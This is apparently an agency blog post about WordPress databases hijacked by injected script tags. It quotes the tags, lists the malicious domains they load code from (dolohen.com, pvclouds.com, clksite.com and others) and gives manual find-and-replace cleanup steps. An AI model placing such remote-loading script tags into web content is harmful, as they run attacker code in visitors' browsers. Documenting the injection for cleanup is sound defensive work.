Dolohen, PV Clouds, CLK Site and Humsoolt WordPress Hacks

Looking for a fix?

We’ve recently had a few sites that are currently hosted with TSOhost (Paragon Internet) be compromised with a script injection into databases.

This, currently, is only an issue with sites that we host with TSOhost – our sites that are hosted with Google Cloud or Digital Ocean are unaffected. If you are worried about your site please contact us. We are putting a fix in place for as many of these sites as possible.

There is a quick fix to remedy the database issue, but stopping it from repeating is causing quite the headache.  We are working on moving all websites we host to a much more secure platform, where we have sites running without any issues at all.

The code tends to a variation of these depending on the URL’s

<script type='text/javascript' src='//pl15180773.pvclouds.com/2b/e2/3d/2be23d024eff3a5446e06744968768be.js'></script><script data-cfasync='false' type='text/javascript' src='//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2'></script>
<script data-cfasync=\'false\' type=\'text/javascript\' src=\'//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2\'></script><script type=\"text/javascript\" src=\"//dolohen.com/apu.php?zoneid=2574011\" async data-cfasync=\"false\"></script><script type=\"text/javascript\" src=\"//dolohen.com/apu.php?zoneid=676630\" async data-cfasync=\"false\"></script>

There are quite a few other malicious URL’s being used as well, those include:

pl15180773.pvclouds.com/2b/e2/3d/2be23d024eff3a5446e06744968768be.js
p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2
dolohen.com/apu.php?zoneid=676630
dolohen.com/apu.php?zoneid=2574011
ellcurvth.com/afu.php?zoneid=
ellcurvth.com/afu.php?zoneid=2826294
humsoolt.net/pfe/current/tag.min.js?z=2774009

If you are looking for help on how to fix this, here is a little run down of our workflow to clear it.  We are moving a lot of sites away from TSO at the moment, this is just the icing on the cake.

1. Backup existing database before attempting this
2. Export your current database to your desktop and open with notepad++ or similar text editor.
3. Do a find for <script> in the database and locate the opening and closing tags that contain the malicious script.  Once you have found it once, do a search for the whole string (i.e. one of the examples above).  Just replace with no content using a Find & Replace.
4. Save the database, but also save a copy of the malicious scripts that you have found
5. Drop the existing database and import the cleaned version
6. The script may return (it has on a couple of sites for us).  If it does, simply follow the same process again and you will be good to go.
7. Move host if it does return – it turns out from a Google search that TSOhost are appearing more and more where these malicious injections are concerned.

Related Articles

One Response

  1. Thanks so much for this. Saved my sites over the last coupe of days. Didn’t realise that it was a common problem, so good to see folk out there helping us out.

    The main issue i had was it kept coming back so quickly before I learnt the database changes.

    THANK YOU SO MUCH!!

Leave a Reply

Your email address will not be published.